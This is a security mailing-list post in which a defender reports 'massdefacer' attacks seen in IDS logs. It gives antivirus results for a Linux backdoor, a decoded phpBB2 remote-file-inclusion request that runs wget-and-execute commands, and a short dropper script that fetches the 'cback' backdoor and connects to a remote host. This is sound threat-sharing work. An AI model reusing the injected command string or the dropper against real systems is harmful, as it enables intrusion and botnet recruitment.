To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- Hello list, I see alot of these "massdefacer by r3v3ng3s" attacks in my IDS sensors. More often than not they are wget'ing the "cback" back door from somewhere else.
(Of course these ip numbers and packages change on a nearly daily basis.) The current cback package gets analyzed by virus total as: Antivirus Version Update Result AntiVir 6.34.0.53 03.20.2006 Linux/Small.AM Avast 4.6.695.0 03.17.2006 no virus found AVG 386 03.20.2006 no virus found Avira 6.34.0.53 03.20.2006 Linux/Small.AM BitDefender 7.2 03.20.2006 no virus found CAT-QuickHeal 8.00 03.20.2006 no virus found ClamAV devel-20060126 03.20.2006 no virus found DrWeb 4.33 03.20.2006 no virus found eTrust-InoculateIT 23.71.106 03.19.2006 no virus found eTrust-Vet 12.4.2126 03.20.2006 no virus found Ewido 3.5 03.20.2006 Backdoor.Small.am Fortinet 2.71.0.0 03.20.2006 Linux/Small.AM!bdr F-Prot 3.16c 03.20.2006 no virus found Ikarus 0.2.59.0 03.20.2006 Backdoor.Linux.Small.AM Kaspersky 4.0.2.24 03.20.2006 Backdoor.Linux.Small.am McAfee 4722 03.20.2006 no virus found NOD32v2 1.1452 03.20.2006 Linux/Small.AM Norman 5.70.10 03.20.2006 no virus found Panda 9.0.0.4 03.20.2006 no virus found Sophos 4.03.0 03.20.2006 no virus found Symantec 8.0 03.20.2006 Hacktool TheHacker 5.9.6.116 03.20.2006 no virus found UNA 1.83 03.20.2006 Backdoor.Linux.Small VBA32 3.10.5 03.19.2006 no virus found The host being referenced for these files is active, packet dump to follow: 47 45 54 20 2F 70 68 70 42 42 32 2F 61 64 6D 69 6E 5F 73 74 79 6C 65 73 2E 70 68 70 3F 70 68 70 62 62 5F 72 6F 6F 74 5F 70 61 74 68 3D 68 74 74 70 3A 2F 2F 38 33 2E 31 36 2E 31 38 37 2E 36 2F 63 6D 64 2E 64 61 74 3F 26 63 6D 64 3D 63 64 25 32 30 2F 74 6D 70 3B 77 67 65 74 25 32 30 38 33 2E 31 36 2E 31 38 37 2E 36 2F 63 61 63 74 69 3B 63 68 6D 6F 64 25 32 30 37 34 34 25 32 30 63 61 63 74 69 3B 2E 2F 63 61 63 74 69 3B 65 63 68 6F 25 32 30 59 59 59 3B 65 63 68 6F 7C 20 20 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20 36 33 2E 39 39 2E 32 31 39 2E 31 32 31 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 31 3B 29 0A 0A GET /phpBB2/admi n_styles.php?php bb_root_path=htt p://83.16.187.6/ cmd.dat?&cmd=cd% 20/tmp;wget%2083 .16.187.6/cacti; chmod%20744%20ca cti;./cacti;echo %20YYY;echo| HT TP/1.1.Host: 63. 99.219.121.User- Agent: Mozilla/4 .0 (compatible; MSIE 6.0; Window s NT 5.1;).. The files are in /cback, /cacti and /cmd.dat. /cmd.dat is the mass defacer /cback is a backdoor (bot?) /cacti is as follows: #!/bin/bash wget 83.16.187.6/cback chmod 744 cback ./cback 209.200.224.165 8080& The 208.x.x.x server has a place holder page up and is hosted by: OrgName: ADDD2NET COM INC DBA LUNARPAGES OrgID: ACIDL Address: Add2Net, Inc. Address: Lunarpages Division Address: 100 East La Habra Blvd. City: La Habra StateProv: CA PostalCode: 90631 Country: US NetRange: 209.200.224.0 - 209.200.239.255 Like I said, I see alot of these with slight variations in the packages, sometimes with .pl bot code etc. It looks like the attack includes the massdefacer script and a backdoor/bot. I know you guys have seen this sort of thing as well, any comments? thanks, bf _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
